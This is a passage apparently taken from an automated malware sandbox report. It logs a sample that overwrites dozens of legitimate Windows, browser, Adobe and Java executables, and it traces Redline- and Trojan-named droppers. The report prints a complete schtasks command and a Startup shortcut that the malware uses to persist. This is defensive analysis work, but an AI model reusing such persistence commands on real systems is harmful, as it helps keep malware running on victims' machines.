                            Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\microsofts.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exeFile created: C:\Users\user\AppData\Local\Temp\build.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

                            Boot Survival

                            barindex
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                            Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_04AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,4_2_04AFCBD0

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Creates files inside the volume driver (system volume information)
                            Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
